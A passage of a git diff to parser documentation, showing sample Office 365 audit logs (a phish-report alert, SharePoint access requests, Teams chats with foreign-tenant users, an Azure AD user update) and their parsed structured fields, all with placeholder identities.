"{\"CreationTime\": \"2024-04-16T08:01:42\", \"Id\": \"d7cab54f-77b1-4ad5-8f2d-b4bba61e4e93\", \"Operation\": \"AlertEntityGenerated\", \"OrganizationId\": \"e0ff0845-9d15-4399-86ae-15081e39a16a\", \"RecordType\": 40, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"SecurityComplianceAlerts\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"SecurityComplianceCenter\", \"ObjectId\": \"jdoe@example.org\", \"UserId\": \"SecurityComplianceAlerts\", \"AlertEntityId\": \"jdoe@example.org\", \"AlertId\": \"a3ce0859-c92c-4f57-b50b-a63dad75ec4a\", \"AlertLinks\": [], \"AlertType\": \"System\", \"Category\": \"ThreatManagement\", \"Comments\": \"New alert\", \"Data\": \"\", \"EntityType\": \"User\", \"Name\": \"Email reported by user as malware or phish\", \"PolicyId\": \"88d533c5-bad6-4cfb-9245-1776726b55d7\", \"Severity\": \"Low\", \"Source\": \"Office 365 Security & Compliance\", \"Status\": \"Investigating\"}", "event": { - "action": "AccessRequestCreated", + "action": "AlertEntityGenerated", "category": [ - "file" + "intrusion_detection" ], - "code": "14", + "code": "40", + "kind": "alert", "outcome": "success", "type": [ "info" ] }, - "@timestamp": "2023-12-13T09:43:17Z", + "@timestamp": "2024-04-16T08:01:42Z", "action": { - "id": 14, - "name": "AccessRequestCreated", + "id": 40, + "name": "AlertEntityGenerated", "outcome": "success", - "properties": [ - { - "SiteUrl": "https://maindomain.com/subdomain/endvalue", - "SourceFileName": "xxxxx.xlsx", - "SourceRelativeUrl": "Documents partages/xxxxx.xlsx", - "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" - } - ], "target": "user" }, - "file": { - "directory": "Documents partages/xxxxx.xlsx", - "extension": "xlsx", - "name": "xxxxx.xlsx" - }, "office365": { + "alert": { + "category": "ThreatManagement", + "display_name": "Email reported by user as malware or phish", + "id": "a3ce0859-c92c-4f57-b50b-a63dad75ec4a", + "severity": "Low", + "source": "Office 365 Security & Compliance", + "status": "Investigating" + }, "audit": { - "object_id": "xxxxx.xlsx" + "object_id": "jdoe@example.org" + }, + "record_type": 40, + "result_status": "Succeeded", + "user_type": { + "code": 4, + "name": "System" + } + }, + "organization": { + "id": "e0ff0845-9d15-4399-86ae-15081e39a16a" + }, + "related": { + "user": [ + "SecurityComplianceAlerts" + ] + }, + "rule": { + "id": "88d533c5-bad6-4cfb-9245-1776726b55d7" + }, + "service": { + "name": "SecurityComplianceCenter" + }, + "user": { + "id": "SecurityComplianceAlerts", + "name": "SecurityComplianceAlerts" + } + } + + ``` + + +=== "source_log.json" + + ```json + + { + "message": "{\"AppAccessContext\": {\"AADSessionId\": \"xxxxxx\", \"CorrelationId\": \"xxxxxx\", \"UniqueTokenId\": \"xxxxxx\"}, \"CreationTime\": \"2023-12-13T09:43:17\", \"Id\": \"xxxxxx\", \"Operation\": \"AccessRequestCreated\", \"OrganizationId\": \"xxxxxx\", \"RecordType\": 14, \"UserKey\": \"i:0h.f|membership|xxxxxx@test.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"SharePoint\", \"ClientIP\": \"0.0.0.0\", \"UserId\": \"user@test.io\", \"AuthenticationType\": \"FormsCookieAuth\", \"BrowserName\": \"Chrome\", \"BrowserVersion\": \"120.0.0.0\", \"CorrelationId\": \"xxxxxx\", \"EventSource\": \"SharePoint\", \"IsManagedDevice\": false, \"ItemType\": \"File\", \"ListId\": \"xxxxx\", \"ListItemUniqueId\": \"xxxxx\", \"Platform\": \"WinDesktop\", \"Site\": \"xxxxxxxxx\", \"UserAgent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\", \"WebId\": \"xxxxxxxxx\", \"DeviceDisplayName\": \"xxxxxxxxx\", \"EventData\": \"Lecture12/03/2024 09:43:15\", \"SourceFileExtension\": \"xlsx\", \"TargetUserOrGroupType\": \"Member\", \"TargetUserOrGroupName\": \"user@test.io\", \"SiteUrl\": \"https://maindomain.com/subdomain/endvalue\", \"SourceRelativeUrl\": \"Documents partages/xxxxx.xlsx\", \"SourceFileName\": \"xxxxx.xlsx\", \"ObjectId\": \"xxxxx.xlsx\"}", + "event": { + "action": "AccessRequestCreated", + "category": [ + "file" + ], + "code": "14", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2023-12-13T09:43:17Z", + "action": { + "id": 14, + "name": "AccessRequestCreated", + "outcome": "success", + "properties": [ + { + "SiteUrl": "https://maindomain.com/subdomain/endvalue", + "SourceFileName": "xxxxx.xlsx", + "SourceRelativeUrl": "Documents partages/xxxxx.xlsx", + "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" + } + ], + "target": "user" + }, + "file": { + "directory": "Documents partages/xxxxx.xlsx", + "extension": "xlsx", + "name": "xxxxx.xlsx" + }, + "office365": { + "audit": { + "object_id": "xxxxx.xlsx" }, "context": { "aad_session_id": "xxxxxx", @@ -2545,7 +2862,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2022-04-05T19:51:35\",\"Id\":\"1324e3d2-f29c-5c15-9f44-1ca64e42250f\",\"Operation\":\"MessageCreatedHasLink\",\"OrganizationId\":\"34314e6e-4023-4e4b-a15e-143f63244e2b\",\"RecordType\":25,\"UserKey\":\"11dbae04-5d5d-4bc7-9766-16793ed91233\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\",\"ClientIP\":\"::ffff:1.2.3.4\",\"UserId\":\"email@example.org\",\"ChatThreadId\":\"19:11dbae04-5d5d-4bc7-9766-16793ed91233_4fdb1e07-a7e9-475c-a5e2-8d042a6c8102@unq.gbl.spaces\",\"CommunicationType\":\"OneOnOne\",\"ExtraProperties\":[{\"Key\":\"TimeZone\",\"Value\":\"Europe/Paris\"},{\"Key\":\"OsName\",\"Value\":\"windows\"},{\"Key\":\"OsVersion\",\"Value\":\"10\"},{\"Key\":\"Country\",\"Value\":\"fr\"},{\"Key\":\"ClientName\",\"Value\":\"skypeteams\"},{\"Key\":\"ClientVersion\",\"Value\":\"27/1.0.0.2022031814\"},{\"Key\":\"ClientUtcOffsetSeconds\",\"Value\":\"7200\"}],\"MessageId\":\"1649188295480\",\"MessageVersion\":\"1649188295480\",\"ItemName\":\"19:11dbae04-5d5d-4bc7-9766-16793ed91233_4fdb1e07-a7e9-475c-a5e2-8d042a6c8102@unq.gbl.spaces\",\"MessageURLs\":[\"https://www.amazon.fr/s?i=merchant-items&me=A1TLEYKQIC7812&marketplaceID=A13V1IB3VIYZZH&qid=1649187214&ref=sr_pg_1\"],\"Members\": [{\"UPN\": \"admin@example.org\", \"Role\": 1}, {\"UPN\": \"user1@example.org\", \"Role\": 0}]}", + "message": "{\"CreationTime\": \"2022-04-05T19:51:35\", \"Id\": \"1324e3d2-f29c-5c15-9f44-1ca64e42250f\", \"Operation\": \"MessageCreatedHasLink\", \"OrganizationId\": \"34314e6e-4023-4e4b-a15e-143f63244e2b\", \"RecordType\": 25, \"UserKey\": \"11dbae04-5d5d-4bc7-9766-16793ed91233\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\", \"ClientIP\": \"::ffff:1.2.3.4\", \"UserId\": \"email@example.org\", \"ChatThreadId\": \"19:11dbae04-5d5d-4bc7-9766-16793ed91233_4fdb1e07-a7e9-475c-a5e2-8d042a6c8102@unq.gbl.spaces\", \"CommunicationType\": \"OneOnOne\", \"ExtraProperties\": [{\"Key\": \"TimeZone\", \"Value\": \"Europe/Paris\"}, {\"Key\": \"OsName\", \"Value\": \"windows\"}, {\"Key\": \"OsVersion\", \"Value\": \"10\"}, {\"Key\": \"Country\", \"Value\": \"fr\"}, {\"Key\": \"ClientName\", \"Value\": \"skypeteams\"}, {\"Key\": \"ClientVersion\", \"Value\": \"27/1.0.0.2022031814\"}, {\"Key\": \"ClientUtcOffsetSeconds\", \"Value\": \"7200\"}], \"MessageId\": \"1649188295480\", \"MessageVersion\": \"1649188295480\", \"ItemName\": \"19:11dbae04-5d5d-4bc7-9766-16793ed91233_4fdb1e07-a7e9-475c-a5e2-8d042a6c8102@unq.gbl.spaces\", \"MessageURLs\": [\"https://www.amazon.fr/s?i=merchant-items&me=A1TLEYKQIC7812&marketplaceID=A13V1IB3VIYZZH&qid=1649187214&ref=sr_pg_1\"], \"Members\": [{\"UPN\": \"admin@example.org\", \"Role\": 1}, {\"UPN\": \"user1@example.org\", \"Role\": 0}]}", "event": { "action": "MessageCreatedHasLink", "category": [ @@ -2623,6 +2940,313 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "teams_with_foreign_tenant_users.json" + + ```json + + { + "message": "{\"AppAccessContext\": {\"IssuedAtTime\": \"2024-06-10T06:51:28\", \"UniqueTokenId\": \"mYyWp_-UrEa4Z_pZM7FlAA\"}, \"CreationTime\": \"2024-06-10T11:50:24\", \"Id\": \"4e3612b5-9cf5-4c6d-8213-2ba12af15334\", \"Operation\": \"ChatCreated\", \"OrganizationId\": \"a84a7a26-d1f0-4d45-a875-481355e2d96c\", \"RecordType\": 25, \"UserKey\": \"c5a134b1-6eb3-4558-95e5-7f3f04219cf2\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\", \"ClientIP\": \"dc73:8fb1:6e9:c37a:334b:8bb7:313a:766b\", \"UserId\": \"c5a134b1-6eb3-4558-95e5-7f3f04219cf2\", \"ChatThreadId\": \"19:2546ebff-72fd-4fda-b537-bc31bf5e1d4c_ba359007-06c1-497f-bc4a-41ea45df4cbd@unq.gbl.spaces\", \"CommunicationType\": \"OneOnOne\", \"ExtraProperties\": [{\"Key\": \"TimeZone\", \"Value\": \"Europe/Paris\"}, {\"Key\": \"OsName\", \"Value\": \"windows\"}, {\"Key\": \"OsVersion\", \"Value\": \"10\"}, {\"Key\": \"Country\", \"Value\": \"fr\"}, {\"Key\": \"ClientName\", \"Value\": \"skypeteams\"}, {\"Key\": \"ClientVersion\", \"Value\": \"27/1.0.0.2024052206\"}, {\"Key\": \"ClientUtcOffsetSeconds\", \"Value\": \"7200\"}], \"Members\": [{\"OrganizationId\": \"6d869a66-371f-4b76-a1f6-3c115469a99d\", \"DisplayName\": \"John Doe\", \"UPN\": \"john.doe@example.org\"}, {\"OrganizationId\": \"6db03b45-27a2-4662-9121-fa5773a8e043\", \"DisplayName\": \"Jane Doe\", \"UPN\": \"jane.doe@example.com\"}], \"ParticipantInfo\": {\"HasForeignTenantUsers\": true, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [\"example.org\", \"example.com\"], \"ParticipatingSIPDomains\": [{\"DomainName\": \"example.org\", \"TenantId\": \"6d869a66-371f-4b76-a1f6-3c115469a99d\"}, {\"DomainName\": \"example.com\", \"TenantId\": \"6db03b45-27a2-4662-9121-fa5773a8e043\"}], \"ParticipatingTenantIds\": [\"6d869a66-371f-4b76-a1f6-3c115469a99d\", \"6db03b45-27a2-4662-9121-fa5773a8e043\"]}, \"ResourceTenantId\": \"6db03b45-27a2-4662-9121-fa5773a8e043\", \"ItemName\": \"19:2546ebff-72fd-4fda-b537-bc31bf5e1d4c_ba359007-06c1-497f-bc4a-41ea45df4cbd@unq.gbl.spaces\"}", + "event": { + "action": "ChatCreated", + "category": [ + "network" + ], + "code": "25", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-10T11:50:24Z", + "action": { + "id": 25, + "name": "ChatCreated", + "outcome": "success", + "target": "network-traffic" + }, + "office365": { + "record_type": 25, + "teams": { + "communication": { + "type": "OneOnOne" + }, + "has_foreign_tenant_users": true, + "team": { + "members": [ + { + "id": "john.doe@example.org", + "name": "John Doe" + }, + { + "id": "jane.doe@example.com", + "name": "Jane Doe" + } + ] + } + }, + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "a84a7a26-d1f0-4d45-a875-481355e2d96c" + }, + "related": { + "ip": [ + "dc73:8fb1:6e9:c37a:334b:8bb7:313a:766b" + ], + "user": [ + "c5a134b1-6eb3-4558-95e5-7f3f04219cf2" + ] + }, + "service": { + "name": "MicrosoftTeams" + }, + "source": { + "address": "dc73:8fb1:6e9:c37a:334b:8bb7:313a:766b", + "ip": "dc73:8fb1:6e9:c37a:334b:8bb7:313a:766b" + }, + "user": { + "id": "c5a134b1-6eb3-4558-95e5-7f3f04219cf2", + "name": "c5a134b1-6eb3-4558-95e5-7f3f04219cf2" + } + } + + ``` + + +=== "teams_with_foreign_tenant_users_2.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-07-12T08:27:46\", \"Id\": \"5964f7bd-8775-4dbe-84a8-37573510558c\", \"Operation\": \"ChatCreated\", \"OrganizationId\": \"456bd527-0a31-47c3-b369-0c04b30849ac\", \"RecordType\": 25, \"UserKey\": \"413e1939-c450-4d63-8226-b02a542e6a9a\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\", \"ClientIP\": \"1.2.3.4\", \"UserId\": \"john.doe@example1.com\", \"ChatThreadId\": \"19:9ac303ea-1bf3-442c-a216-a517de868921_413e1939-c450-4d63-8226-b02a542e6a9a@unq.gbl.spaces\", \"CommunicationType\": \"OneOnOne\", \"ExtraProperties\": [{\"Key\": \"TimeZone\", \"Value\": \"Europe/Berlin\"}, {\"Key\": \"OsName\", \"Value\": \"windows\"}, {\"Key\": \"OsVersion\", \"Value\": \"NT 10.0\"}, {\"Key\": \"Country\", \"Value\": \"de\"}, {\"Key\": \"ClientName\", \"Value\": \"skypeteams\"}, {\"Key\": \"ClientVersion\", \"Value\": \"49/24061318408\"}, {\"Key\": \"ClientUtcOffsetSeconds\", \"Value\": \"7200\"}], \"Members\": [{\"OrganizationId\": \"456bd527-0a31-47c3-b369-0c04b30849ac\", \"DisplayName\": \"John Doe\", \"UPN\": \"john.doe@example1.com\"}, {\"OrganizationId\": \"f35fe983-e797-44ce-bd0b-cf4da93a8043\", \"DisplayName\": \"Jane Doe\", \"UPN\": \"jane.doe@example2.com\"}], \"ParticipantInfo\": {\"HasForeignTenantUsers\": true, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [\"example1.com\", \"example2.com\"], \"ParticipatingSIPDomains\": [{\"DomainName\": \"example1.com\", \"TenantId\": \"456bd527-0a31-47c3-b369-0c04b30849ac\"}, {\"DomainName\": \"example2.com\", \"TenantId\": \"f35fe983-e797-44ce-bd0b-cf4da93a8043\"}], \"ParticipatingTenantIds\": [\"f35fe983-e797-44ce-bd0b-cf4da93a8043\", \"456bd527-0a31-47c3-b369-0c04b30849ac\"]}, \"ResourceTenantId\": \"456bd527-0a31-47c3-b369-0c04b30849ac\", \"ItemName\": \"19:9ac303ea-1bf3-442c-a216-a517de868921_413e1939-c450-4d63-8226-b02a542e6a9a@unq.gbl.spaces\"}", + "event": { + "action": "ChatCreated", + "category": [ + "network" + ], + "code": "25", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-12T08:27:46Z", + "action": { + "id": 25, + "name": "ChatCreated", + "outcome": "success", + "target": "network-traffic" + }, + "office365": { + "record_type": 25, + "teams": { + "communication": { + "type": "OneOnOne" + }, + "has_foreign_tenant_users": true, + "team": { + "members": [ + { + "id": "john.doe@example1.com", + "name": "John Doe" + }, + { + "id": "jane.doe@example2.com", + "name": "Jane Doe" + } + ] + } + }, + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "456bd527-0a31-47c3-b369-0c04b30849ac" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@example1.com" + ] + }, + "service": { + "name": "MicrosoftTeams" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@example1.com", + "id": "413e1939-c450-4d63-8226-b02a542e6a9a", + "name": "john.doe@example1.com" + } + } + + ``` + + +=== "teams_with_foreign_tenant_users_3.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-07-12T08:27:37\", \"Id\": \"db1cd437-5417-4cd3-ae6b-19a980f9bcfc\", \"Operation\": \"ChatCreated\", \"OrganizationId\": \"41847cb3-0096-48f2-82d0-c4f1bf92e031\", \"RecordType\": 25, \"UserKey\": \"4daf1829-8823-454f-b4e0-1cd22342d5f3\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\", \"ClientIP\": \"1.2.3.4\", \"UserId\": \"john.doe@example1.com\", \"ChatThreadId\": \"19:d473ae3c-906c-4a72-8b3f-18e6c9bfdcd7_4daf1829-8823-454f-b4e0-1cd22342d5f3@unq.gbl.spaces\", \"CommunicationType\": \"OneOnOne\", \"ExtraProperties\": [{\"Key\": \"TimeZone\", \"Value\": \"Europe/Berlin\"}, {\"Key\": \"OsName\", \"Value\": \"windows\"}, {\"Key\": \"OsVersion\", \"Value\": \"NT 10.0\"}, {\"Key\": \"Country\", \"Value\": \"de\"}, {\"Key\": \"ClientName\", \"Value\": \"skypeteams\"}, {\"Key\": \"ClientVersion\", \"Value\": \"49/24061318408\"}, {\"Key\": \"ClientUtcOffsetSeconds\", \"Value\": \"7200\"}], \"Members\": [{\"OrganizationId\": \"41847cb3-0096-48f2-82d0-c4f1bf92e031\", \"DisplayName\": \"John Doe\", \"UPN\": \"john.doe@example1.com\"}, {\"OrganizationId\": \"1d36ca61-5509-4ac7-983d-91dfdeb5f492\", \"DisplayName\": \"Jane Doe\", \"UPN\": \"jane.doe@example2.com\"}], \"ParticipantInfo\": {\"HasForeignTenantUsers\": true, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [\"example1.com\", \"example2.com\"], \"ParticipatingSIPDomains\": [{\"DomainName\": \"example1.com\", \"TenantId\": \"41847cb3-0096-48f2-82d0-c4f1bf92e031\"}, {\"DomainName\": \"example2.com\", \"TenantId\": \"1d36ca61-5509-4ac7-983d-91dfdeb5f492\"}], \"ParticipatingTenantIds\": [\"1d36ca61-5509-4ac7-983d-91dfdeb5f492\", \"41847cb3-0096-48f2-82d0-c4f1bf92e031\"]}, \"ResourceTenantId\": \"41847cb3-0096-48f2-82d0-c4f1bf92e031\", \"ItemName\": \"19:d473ae3c-906c-4a72-8b3f-18e6c9bfdcd7_4daf1829-8823-454f-b4e0-1cd22342d5f3@unq.gbl.spaces\"}", + "event": { + "action": "ChatCreated", + "category": [ + "network" + ], + "code": "25", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-12T08:27:37Z", + "action": { + "id": 25, + "name": "ChatCreated", + "outcome": "success", + "target": "network-traffic" + }, + "office365": { + "record_type": 25, + "teams": { + "communication": { + "type": "OneOnOne" + }, + "has_foreign_tenant_users": true, + "team": { + "members": [ + { + "id": "john.doe@example1.com", + "name": "John Doe" + }, + { + "id": "jane.doe@example2.com", + "name": "Jane Doe" + } + ] + } + }, + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "41847cb3-0096-48f2-82d0-c4f1bf92e031" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@example1.com" + ] + }, + "service": { + "name": "MicrosoftTeams" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@example1.com", + "id": "4daf1829-8823-454f-b4e0-1cd22342d5f3", + "name": "john.doe@example1.com" + } + } + + ``` + + +=== "teams_without_foreign_tenant_users.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-06-10T12:14:57\", \"Id\": \"f47118c3-edcf-43a9-b505-c7c904231ac2\", \"Operation\": \"ChatCreated\", \"OrganizationId\": \"e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1\", \"RecordType\": 25, \"UserKey\": \"70de41a7-73c7-4532-8257-25ec88456e99\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\", \"ClientIP\": \"194.169.176.18\", \"UserId\": \"jdoe_example.org#EXT#@example.onmicrosoft.com\", \"ChatThreadId\": \"19:0f738a46-74e0-45cf-a5e7-ff31eb2d9cdb_e574a199-c965-4fe2-8c02-0a98a1e8f597@unq.gbl.spaces\", \"CommunicationType\": \"OneOnOne\", \"ExtraProperties\": [{\"Key\": \"TimeZone\", \"Value\": \"Europe/Paris\"}, {\"Key\": \"OsName\", \"Value\": \"windows\"}, {\"Key\": \"OsVersion\", \"Value\": \"NT 10.0\"}, {\"Key\": \"Country\", \"Value\": \"fr\"}, {\"Key\": \"ClientName\", \"Value\": \"skypeteams\"}, {\"Key\": \"ClientVersion\", \"Value\": \"49/24051622207\"}, {\"Key\": \"ClientUtcOffsetSeconds\", \"Value\": \"7200\"}], \"Members\": [{\"OrganizationId\": \"e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1\", \"DisplayName\": \"John Doe\", \"UPN\": \"jdoe_example.org#EXT#@example.onmicrosoft.com\"}, {\"OrganizationId\": \"e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1\", \"DisplayName\": \"Jane Doe\", \"UPN\": \"jane.doe@example.org\"}], \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": true, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1\"]}, \"ResourceTenantId\": \"e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1\", \"ItemName\": \"19:0f738a46-74e0-45cf-a5e7-ff31eb2d9cdb_e574a199-c965-4fe2-8c02-0a98a1e8f597@unq.gbl.spaces\"}", + "event": { + "action": "ChatCreated", + "category": [ + "network" + ], + "code": "25", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-10T12:14:57Z", + "action": { + "id": 25, + "name": "ChatCreated", + "outcome": "success", + "target": "network-traffic" + }, + "office365": { + "record_type": 25, + "teams": { + "communication": { + "type": "OneOnOne" + }, + "has_foreign_tenant_users": false, + "team": { + "members": [ + { + "id": "jdoe_example.org#EXT#@example.onmicrosoft.com", + "name": "John Doe" + }, + { + "id": "jane.doe@example.org", + "name": "Jane Doe" + } + ] + } + }, + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1" + }, + "related": { + "ip": [ + "194.169.176.18" + ], + "user": [ + "jdoe_example.org#EXT#@example.onmicrosoft.com" + ] + }, + "service": { + "name": "MicrosoftTeams" + }, + "source": { + "address": "194.169.176.18", + "ip": "194.169.176.18" + }, + "user": { + "email": "jdoe_example.org#EXT#@example.onmicrosoft.com", + "id": "70de41a7-73c7-4532-8257-25ec88456e99", + "name": "jdoe_example.org#EXT#@example.onmicrosoft.com" + } + } + + ``` + + === "threat_intel.json" ```json @@ -2812,7 +3436,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2021-03-05T14:43:17\",\"Id\":\"21a107c2-2071-4ce3-8330-cf82f3caa79f\",\"Operation\":\"Update user.\",\"OrganizationId\":\"3e49b082-62d5-4849-a5b0-86ed519287d2\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"UserKey\":\"10030000A96EA230@domain.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"\",\"ObjectId\":\"aaaa.bbbb@example.org\",\"UserId\":\"user@domain.onmicrosoft.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\":[{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"UserType\\\":\\\"Member\\\"}\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"}],\"ModifiedProperties\":[{\"Name\":\"LastDirSyncTime\",\"NewValue\":\"[\\r\\n \\\"2021-03-05T14:43:17Z\\\"\\r\\n]\",\"OldValue\":\"[\\r\\n \\\"2021-03-03T12:30:50Z\\\"\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"LastDirSyncTime\",\"OldValue\":\"\"},{\"Name\":\"Action Client Name\",\"NewValue\":\"DirectorySync\",\"OldValue\":\"\"},{\"Name\":\"TargetId.UserType\",\"NewValue\":\"Member\",\"OldValue\":\"\"}],\"Actor\":[{\"ID\":\"user@domain.onmicrosoft.com\",\"Type\":5},{\"ID\":\"10030000A96EA230\",\"Type\":3},{\"ID\":\"User_c96cf894-cca6-438b-b6f2-c2744c1680f5\",\"Type\":2},{\"ID\":\"c96cf894-cca6-438b-b6f2-c2744c1680f5\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"3e49b082-62d5-4849-a5b0-86ed519287d2\",\"ActorIpAddress\":\"\",\"InterSystemsId\":\"92d46438-1e67-43e3-91ca-039ff39d7217\",\"IntraSystemId\":\"bd8cc421-efe8-4a44-b61d-44670fc6f56e\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_de76d2a9-d8bf-47d4-8f74-2ba2b560f55e\",\"Type\":2},{\"ID\":\"de76d2a9-d8bf-47d4-8f74-2ba2b560f55e\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"aaaa.bbbb@example.org\",\"Type\":5},{\"ID\":\"1003200119762B26\",\"Type\":3}],\"TargetContextId\":\"3e49b082-62d5-4849-a5b0-86ed519287d2\"}", + "message": "{\"CreationTime\": \"2021-03-05T14:43:17\", \"Id\": \"21a107c2-2071-4ce3-8330-cf82f3caa79f\", \"Operation\": \"Update user.\", \"OrganizationId\": \"3e49b082-62d5-4849-a5b0-86ed519287d2\", \"RecordType\": 8, \"ResultStatus\": \"Success\", \"UserKey\": \"10030000A96EA230@domain.onmicrosoft.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"AzureActiveDirectory\", \"ClientIP\": \"\", \"ObjectId\": \"aaaa.bbbb@example.org\", \"UserId\": \"user@domain.onmicrosoft.com\", \"AzureActiveDirectoryEventType\": 1, \"ExtendedProperties\": [{\"Name\": \"additionalDetails\", \"Value\": \"{\\\"UserType\\\":\\\"Member\\\"}\"}, {\"Name\": \"extendedAuditEventCategory\", \"Value\": \"User\"}], \"ModifiedProperties\": [{\"Name\": \"LastDirSyncTime\", \"NewValue\": \"[\\r\\n \\\"2021-03-05T14:43:17Z\\\"\\r\\n]\", \"OldValue\": \"[\\r\\n \\\"2021-03-03T12:30:50Z\\\"\\r\\n]\"}, {\"Name\": \"Included Updated Properties\", \"NewValue\": \"LastDirSyncTime\", \"OldValue\": \"\"}, {\"Name\": \"Action Client Name\", \"NewValue\": \"DirectorySync\", \"OldValue\": \"\"}, {\"Name\": \"TargetId.UserType\", \"NewValue\": \"Member\", \"OldValue\": \"\"}], \"Actor\": [{\"ID\": \"user@domain.onmicrosoft.com\", \"Type\": 5}, {\"ID\": \"10030000A96EA230\", \"Type\": 3}, {\"ID\": \"User_c96cf894-cca6-438b-b6f2-c2744c1680f5\", \"Type\": 2}, {\"ID\": \"c96cf894-cca6-438b-b6f2-c2744c1680f5\", \"Type\": 2}, {\"ID\": \"User\", \"Type\": 2}], \"ActorContextId\": \"3e49b082-62d5-4849-a5b0-86ed519287d2\", \"ActorIpAddress\": \"\", \"InterSystemsId\": \"92d46438-1e67-43e3-91ca-039ff39d7217\", \"IntraSystemId\": \"bd8cc421-efe8-4a44-b61d-44670fc6f56e\", \"SupportTicketId\": \"\", \"Target\": [{\"ID\": \"User_de76d2a9-d8bf-47d4-8f74-2ba2b560f55e\", \"Type\": 2}, {\"ID\": \"de76d2a9-d8bf-47d4-8f74-2ba2b560f55e\", \"Type\": 2}, {\"ID\": \"User\", \"Type\": 2}, {\"ID\": \"aaaa.bbbb@example.org\", \"Type\": 5}, {\"ID\": \"1003200119762B26\", \"Type\": 3}], \"TargetContextId\": \"3e49b082-62d5-4849-a5b0-86ed519287d2\"}", "event": { "action": "Update user.", "category": [ @@ -2838,7 +3462,29 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "context": { "correlation": { "id": "92d46438-1e67-43e3-91ca-039ff39d7217" - } + }, + "modified_properties": [ + { + "Name": "LastDirSyncTime", + "NewValue": "[\r\n \"2021-03-05T14:43:17Z\"\r\n]", + "OldValue": "[\r\n \"2021-03-03T12:30:50Z\"\r\n]" + }, + { + "Name": "Included Updated Properties", + "NewValue": "LastDirSyncTime", + "OldValue": "" + }, + { + "Name": "Action Client Name", + "NewValue": "DirectorySync", + "OldValue": "" + }, + { + "Name": "TargetId.UserType", + "NewValue": "Member", + "OldValue": "" + } + ] }, "record_type": 8, "result_status": "Success", @@ -3065,7 +3711,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": 